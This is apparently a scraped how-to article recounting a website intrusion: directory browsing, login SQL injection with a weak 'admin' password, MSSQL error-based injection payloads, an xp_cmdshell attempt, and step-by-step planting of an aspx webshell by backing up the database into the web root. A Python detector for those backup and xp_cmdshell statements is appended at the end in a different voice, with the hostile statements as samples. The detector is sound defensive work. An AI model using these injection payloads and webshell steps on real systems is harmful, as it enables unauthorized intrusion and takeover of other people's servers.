2025-01-17 Update From: SLTechnology News&Howtos > Database
Shulou (Shulou.com) 06/01 Report
0x00 Preface
A scanner flagged directory browsing on a website, hence this article.
Background knowledge:
1. Directory browsing
In my opinion, directory browsing is a fairly harmful vulnerability. It means that in a directory with no default document, the server lists every file name and its file information. If a site has this misconfiguration and you know the directory names, you can see the files inside those directories.
2. Differential backup
Preconditions: the site's absolute path is known, and the current database account has write permission to that path.
0x01 Body
The site was misconfigured, which enabled directory browsing. By reading the home page source, I found several directories.
Visiting one at random produced an error page, showing that the webmaster had not suppressed error messages.
This also leaks information.
But the files in these directories usually need parameters to execute, and since the parameter names are unknown, there was no way to use them.
After some back and forth, I went to the front-end login page to check.
A quick test found both SQL injection and the weak password admin, so it is possible to log in with a universal password.
I originally wanted to find a file upload point to get a shell directly, but none seemed to exist. However, the site uses KindEditor, and its absolute path was disclosed.
Since there is injection at the login page, there is usually plenty of injection in the back end as well. Try to find it; if found, the absolute path can be used to get a shell.
OK, found injection, but the database type is still unknown. The usual combination is aspx + MSSQL, and since errors were displayed earlier, try the MSSQL error-based method:
%' and 1=@@version-- a
Check the current user identity of the MSSQL database:
%' and 1=user-- a
The permission is dbo, not sa. Try xp_cmdshell:
%'; exec ('master..xp_cmdshell whoami')-- a
xp_cmdshell is not enabled, and dbo does not have sufficient permission to enable it, so the only option left is to try writing a webshell via differential backup.
1. Get the current database name:
%' and 1=db_name()-- a
2. Back up the current database:
%'; backup database <database name> to disk = '<absolute path>' with init-- a
If the backup succeeds, the page returns the query result for %' (because the query is stacked, the subsequent statement returns no result).
3. Create the table and write the webshell:
%'; create table cmd (a image)-- a
%'; insert into cmd (a) values (0xxxxx)-- a // hex value of the webshell
You can use an online tool for the hex encoding; I used a small tool I wrote myself.
4. Make a second backup:
%'; backup log <database name> to disk = '<absolute path>\\abc.aspx'--
Here I wrote the webshell into a subdirectory; because directory browsing is enabled, you can see directly whether the file was generated.
After it is created successfully, try to connect.
0x02 Afterword
If xp_cmdshell can be used directly, avoid differential backup, because it leaves backup files behind; if the database is very large, this has a noticeable impact.
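As an added defensive example (not from the original article), the following Python checks captured T-SQL statements, such as those recorded by SQL Server Audit or Extended Events, for the two things this write-up relies on: a BACKUP ... TO DISK whose destination is outside the approved backup directory or carries a web-executable extension, and any reference to xp_cmdshell. The allowed directory, the extension lists and the sample statements are assumptions constructed for this example.

```python
import re
from pathlib import PureWindowsPath

# Assumed policy for the monitored server (hypothetical values): legitimate
# backups go only under this directory and only use these extensions.
ALLOWED_BACKUP_DIR = PureWindowsPath(r"D:\SQLBackups")
ALLOWED_EXTENSIONS = {".bak", ".trn", ".dif"}
# Extensions the web server would execute if a backup landed under the web root.
WEB_EXECUTABLE = {".aspx", ".asp", ".ashx", ".asmx", ".php", ".jsp"}

BACKUP_RE = re.compile(
    r"backup\s+(database|log)\s+(\S+)\s+to\s+disk\s*=\s*'([^']*)'", re.IGNORECASE)
XP_CMDSHELL_RE = re.compile(r"\bxp_cmdshell\b", re.IGNORECASE)


def analyze_statement(sql: str) -> list[str]:
    """Return the findings for one captured T-SQL statement (empty list = clean)."""
    findings = []
    if XP_CMDSHELL_RE.search(sql):
        findings.append("xp_cmdshell referenced")
    for kind, db, dest in BACKUP_RE.findall(sql):
        path = PureWindowsPath(dest)
        ext = path.suffix.lower()
        label = f"backup {kind.lower()} of {db}"
        if ext in WEB_EXECUTABLE:
            findings.append(f"{label} written with web-executable extension {ext}")
        elif ext not in ALLOWED_EXTENSIONS:
            findings.append(f"{label} written with unexpected extension {ext or '(none)'}")
        # PureWindowsPath compares case-insensitively, like NTFS does.
        if ALLOWED_BACKUP_DIR not in path.parents:
            findings.append(f"{label} written outside {ALLOWED_BACKUP_DIR}")
    return findings


def scan(statements: list[str]) -> dict[int, list[str]]:
    """Map the index of every suspicious statement to its findings."""
    result = {}
    for i, sql in enumerate(statements):
        findings = analyze_statement(sql)
        if findings:
            result[i] = findings
    return result


# Constructed sample statements in the shape an audit log would record them.
SAMPLE_STATEMENTS = [
    "BACKUP DATABASE appdb TO DISK = 'D:\\SQLBackups\\appdb_full.bak' WITH INIT",
    "backup database appdb to disk = 'C:\\inetpub\\wwwroot\\site\\upload\\x.bak' with init",
    "backup log appdb to disk = 'C:\\inetpub\\wwwroot\\site\\upload\\abc.aspx'",
    "exec ('master..xp_cmdshell whoami')",
]
```

Running scan(SAMPLE_STATEMENTS) flags statements 1 to 3 and leaves the routine backup in statement 0 untouched; hooking this into an audit pipeline gives an alert for exactly the backup-to-web-root pattern described above.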
If there are any mistakes, please correct them.